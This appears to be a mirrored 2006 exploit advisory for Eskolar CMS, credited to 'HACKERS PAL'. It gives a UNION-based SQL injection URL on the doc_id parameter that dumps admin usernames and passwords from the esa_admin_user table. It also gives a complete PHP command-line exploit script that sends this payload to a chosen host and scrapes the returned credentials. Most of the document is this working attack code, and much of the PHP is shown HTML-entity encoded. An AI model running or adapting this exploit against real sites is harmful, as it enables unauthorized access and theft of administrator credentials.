Eskolar CMS Remote Sql Injection

2006-09-2300:00:00

vulners.com

JSON

Hello,

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

Remote Sql injection :-
/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*

Exploit:
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* Eskolar CMS Remote sql injection exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/
print_r('
//
/ Eskolar CMS Remote sql injection exploit /
/ by HACKERS PAL <[email protected]> /
/ site: http://www.soqor.net /');
if ($argc<2) {
print_r('
/ – /
/ Usage: php '.$argv[0].' host
/ Example: /
/ php '.$argv[0].' http://localhost/eskolar/
/***/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*";
$page=$url.$exploit;
Function get_page($url)
{

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }
     $i=0;

     function get&#40;$var&#41;
     {
      GLOBAL $i;
       $var[1]=trim&#40;$var[1]&#41;;
      if&#40;$i==0&#41;
      {
      Echo &quot;&#92;n[+] User Name : &quot;.$var[1];
     $i++;
      }
      else
      {
      Echo &quot;&#92;n[+] Pass Word : &quot;.$var[1];
              }


     }

 $page = get_page&#40;$page&#41;;

 if&#40;!preg_match&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,$page&#41;||!preg_match&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,$page&#41;&#41;
 {
          Die&#40;&quot;&#92;n[-] Exploit Failed&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;
 }

 preg_replace_callback&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,&#39;get&#39;,$page&#41;;

 preg_replace_callback&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,&#39;get&#39;,$page&#41;;

          Die&#40;&quot;&#92;n/*       Visit us : WwW.SoQoR.NeT             */&#92;n/**********************************************/&quot;&#41;;

?>
#WwW.SoQoR.NeT

JSON